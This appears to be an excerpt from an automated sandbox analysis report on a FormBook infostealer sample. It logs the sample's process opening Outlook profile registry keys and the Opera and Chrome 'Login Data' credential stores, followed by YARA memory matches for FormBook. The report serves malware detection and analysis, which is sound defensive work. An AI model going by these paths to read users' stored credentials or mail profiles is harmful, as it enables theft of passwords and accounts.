Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY